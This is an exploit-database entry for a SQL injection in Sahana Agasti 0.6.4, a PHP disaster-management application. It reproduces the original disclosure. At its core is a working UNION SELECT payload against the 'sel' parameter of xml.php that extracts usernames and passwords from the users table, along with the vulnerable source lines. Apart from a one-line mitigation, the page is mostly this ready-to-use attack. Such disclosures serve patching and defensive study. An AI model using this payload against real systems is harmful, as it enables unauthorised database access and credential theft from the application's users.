Sahana Agasti - exploit.company

vendor:

Sahana Agasti

by:

dun

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Sahana Agasti

Affected Version From: 2000.6.4

Affected Version To: 2000.6.4

Patch Exists: NO

Related CWE: N/A

CPE: a:sahana_software_foundation:sahana_agasti

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Sahana Agasti <= 0.6.4 SQL Injection Vulnerability

A SQL injection vulnerability exists in Sahana Agasti version 0.6.4. The vulnerability is due to the application not properly sanitizing user-supplied input to the 'sel' parameter of the 'xml.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM
 
   [ Discovered by dun \ posdub[at]gmail.com ]

 ################################################################
 #  [ Sahana Agasti <= 0.6.4 ]  SQL Injection Vulnerability     #
 ################################################################
 #
 # Script: "Agasti is the PHP based project of the Sahana Software Foundation. 
 #          Based a long-term preparedness for disaster management..."
 #
 # Script site: http://www.sahanafoundation.org/
 # Download: https://launchpad.net/sahana-agasti/
 #
 # [SQL] Vuln: 
 # http://site.com/agasti/sahana-0.6.4/www/xml.php?act=add_loc&sel=1/**/UNION/**/SELECT/**/null,concat(CHAR(60,66,82,62),concat_ws(char(58),user_name,password)),null/**/FROM/**/users
 #    
 #    
 # Bug: ./sahana-0.6.4/www/xml.php (lines: 17-21, 200-223)
 #
 # ...
 # $act=$_GET{"act"};                                                          //
 # 
 # if($act=='add_loc')                                                         // (1)
 # {
 #         _shn_get_level_location();                                          //
 # ...
 # 
 # function _shn_get_level_location(){
 #         require_once('../3rd/adodb/adodb.inc.php');
 #         require_once('../conf/sysconf.inc.php');
 #         //Make the connection to $global['db']
 #         $db = NewADOConnection($conf['db_engine']);
 #        $db ->Connect($conf['db_host'].($conf['db_port']?':'.$conf['db_port']:''),$conf['db_user'],$conf['db_pass'],$conf['db_name']);
 # 
 # 
 #         $level=$_GET{"sel"};                                                // (2)
 #         if($level==1){
 #                 echo "none,";
 #         }
 #         $q = "SELECT location.name,location.loc_uuid,parent_id FROM location WHERE location.opt_location_type={$level}";          // (3) SQL
 #         $res_child=$db->Execute($q);
 #         if($res_child->EOF)
 #         return;
 #         while(!$res_child->EOF){
 #                 $res=$res.",".$res_child->fields[1];
 #                 $res=$res.",".$res_child->fields[0];
 #                $res_child->MoveNext();
 #        }
 #         echo $res;                                                          // (4)
 # }
 # ...  
 # 
 # 
 ###############################################

 
 [ dun / 2011-01-01 ]